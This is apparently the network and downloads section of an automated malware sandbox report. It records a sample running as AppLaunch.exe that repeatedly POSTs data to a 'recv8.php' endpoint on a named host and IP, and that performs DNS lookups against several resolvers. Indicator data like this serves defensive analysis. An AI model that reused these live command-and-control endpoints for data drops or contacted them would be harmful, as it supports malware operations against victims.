                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          671 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          28.7kB
                          1.2kB
                          26
                          19

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.2kB
                          631 B
                          7
                          5

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 8.8.8.8:53
                          google.com
                          dns
                          chrome.exe
                          56 B
                          72 B
                          1
                          1

                          DNS Request

                          google.com

                          DNS Response

                          216.58.214.14

                        • 8.8.8.8:53
                          sdns.se
                          dns
                          AppLaunch.exe
                          53 B
                          69 B
                          1
                          1

                          DNS Request

                          sdns.se

                          DNS Response

                          185.243.215.214

                        • 8.8.8.8:53
                          ntp.se
                          dns
                          AppLaunch.exe
                          52 B
                          68 B
                          1
                          1

                          DNS Request

                          ntp.se

                          DNS Response

                          194.58.200.20

                        • 194.58.200.20:123
                          ntp.se
                          ntp
                          AppLaunch.exe
                          76 B
                          76 B
                          1
                          1
                        • 185.243.215.214:53
                          sdns.se
                          dns
                          AppLaunch.exe
                          405 B
                          5

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                        • 194.58.200.20:123
                          ntp.se
                          ntp
                          AppLaunch.exe
                          76 B
                          76 B
                          1
                          1
                        • 185.243.215.214:53
                          sdns.se
                          dns
                          AppLaunch.exe
                          405 B
                          5

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                        • 185.243.215.214:53
                          sdns.se
                          dns
                          AppLaunch.exe
                          405 B
                          5

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                        • 194.58.200.20:123
                          ntp.se
                          ntp
                          AppLaunch.exe
                          76 B
                          76 B
                          1
                          1
                        • 1.2.4.8:53
                          387d8b62b0aef501f4f4ebef23416753.se
                          dns
                          AppLaunch.exe
                          81 B
                          157 B
                          1
                          1

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                        • 1.2.4.8:53
                          387d8b62b0aef501f4f4ebef23416753.se
                          dns
                          AppLaunch.exe
                          81 B
                          157 B
                          1
                          1

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                        • 194.58.200.20:123
                          ntp.se
                          ntp
                          AppLaunch.exe
                          76 B
                          76 B
                          1
                          1
                        • 114.114.114.114:53
                          387d8b62b0aef501f4f4ebef23416753.se
                          dns
                          AppLaunch.exe
                          81 B
                          157 B
                          1
                          1

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                        • 114.114.114.114:53
                          387d8b62b0aef501f4f4ebef23416753.se
                          dns
                          AppLaunch.exe
                          81 B
                          157 B
                          1
                          1

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                        • 8.8.8.8:53
                          teamseed.wm01.to
                          dns
                          AppLaunch.exe
                          62 B
                          78 B
                          1
                          1

                          DNS Request

                          teamseed.wm01.to

                          DNS Response

                          45.153.186.90

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • memory/512-143-0x0000000002B30000-0x0000000002B31000-memory.dmp

                          Filesize

                          4KB

                        • memory/1504-155-0x0000000000400000-0x000000000041B000-memory.dmp

                          Filesize

                          108KB

                        • memory/1504-171-0x0000000000400000-0x000000000041B000-memory.dmp

                          Filesize

                          108KB

                        • memory/1968-117-0x0000000005200000-0x0000000005201000-memory.dmp

                          Filesize

                          4KB

                        • memory/1968-114-0x0000000000B10000-0x0000000000B11000-memory.dmp

                          Filesize

                          4KB

                        • memory/1968-116-0x0000000005700000-0x0000000005701000-memory.dmp

                          Filesize

                          4KB

                        • memory/1968-118-0x0000000005130000-0x0000000005131000-memory.dmp

                          Filesize

                          4KB

                        • memory/1968-119-0x00000000051E0000-0x00000000051E1000-memory.dmp

                          Filesize

                          4KB

                        • memory/2420-154-0x0000000007530000-0x0000000008530000-memory.dmp

                          Filesize

                          16.0MB

                        • memory/2420-149-0x0000000000400000-0x00000000005F7000-memory.dmp

                          Filesize

                          2.0MB

                        • memory/2420-145-0x0000000000400000-0x00000000005F7000-memory.dmp

                          Filesize

                          2.0MB

                        • memory/3264-133-0x0000000000A10000-0x0000000000A11000-memory.dmp

                          Filesize

                          4KB

                        • memory/3264-128-0x0000000000B50000-0x0000000000B51000-memory.dmp

                          Filesize

                          4KB

                        • memory/3884-177-0x0000000005740000-0x0000000005741000-memory.dmp

                          Filesize

                          4KB

                        We care about your privacy.

                        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.